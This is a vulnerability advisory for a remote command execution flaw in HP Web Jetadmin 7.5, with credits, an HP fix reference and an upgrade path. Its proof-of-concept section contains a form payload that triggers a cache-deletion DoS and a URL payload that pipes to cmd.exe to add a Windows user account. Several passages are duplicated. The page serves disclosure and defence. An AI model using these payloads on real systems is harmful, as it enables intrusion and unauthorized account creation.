HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
BID:9973
Info
HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 9973 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2004 12:00AM |
| Updated: | Mar 24 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to "wirepair" <[email protected]> and H D Moore <[email protected]>. |
| Vulnerable: |
HP Web Jetadmin 7.5.2456 |
| Not Vulnerable: | |
Discussion
HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
Reportedly HP web Jetadmin is prone to a remote arbitrary command execution vulnerability. This issue is due to a failure of the application to properly validate and sanitize user supplied input.
Successful exploitation of this issue will allow a malicious user to execute arbitrary commands on the affected system.
This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.
Reportedly HP web Jetadmin is prone to a remote arbitrary command execution vulnerability. This issue is due to a failure of the application to properly validate and sanitize user supplied input.
Successful exploitation of this issue will allow a malicious user to execute arbitrary commands on the affected system.
This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.
Exploit / POC
HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
The following proof of concept example has been provided:
/plugins/hpjfpmui/script/wja_update_product.hts:
(Changed the value of obj to our DoS function)
<FORM onsubmit="return VerifyUpload(this)" action=wja_update_product.hts
method=post encType=multipart/form-data>
<INPUT type=hidden value=[[httpd:RemoveCacheFiles($dir$)]] name=obj> <INPUT
type=hidden value=true name=__save>
<INPUT type=hidden value=0 name=packageCount> <INPUT type=hidden value=blah.fpm name=goodFilename>
The following proof of concept that will create a user account has been provided by H D Moore <[email protected]>:
https://<target>:8443/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD")
The following proof of concept example has been provided:
/plugins/hpjfpmui/script/wja_update_product.hts:
(Changed the value of obj to our DoS function)
<FORM onsubmit="return VerifyUpload(this)" action=wja_update_product.hts
method=post encType=multipart/form-data>
<INPUT type=hidden value=[[httpd:RemoveCacheFiles($dir$)]] name=obj> <INPUT
type=hidden value=true name=__save>
<INPUT type=hidden value=0 name=packageCount> <INPUT type=hidden value=blah.fpm name=goodFilename>
The following proof of concept that will create a user account has been provided by H D Moore <[email protected]>:
https://<target>:8443/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD")
Solution / Fix
HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
Solution:
HP has made an advisory available (SSRT4739 rev.0) dealing with this issue. Please see the referenced advisory for more information.
HP Web Jetadmin 7.5.2456
Solution:
HP has made an advisory available (SSRT4739 rev.0) dealing with this issue. Please see the referenced advisory for more information.
HP Web Jetadmin 7.5.2456
-
HP Web Jetadmin 7.6
http://www.hp.com/go/webjetadmin
References
HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
References:
References:
- HP Web Jetadmin Homepage (HP)
- HP Web JetAdmin vulnerabilities. ("wirepair"
- Re: HP Web JetAdmin vulnerabilities. (H D Moore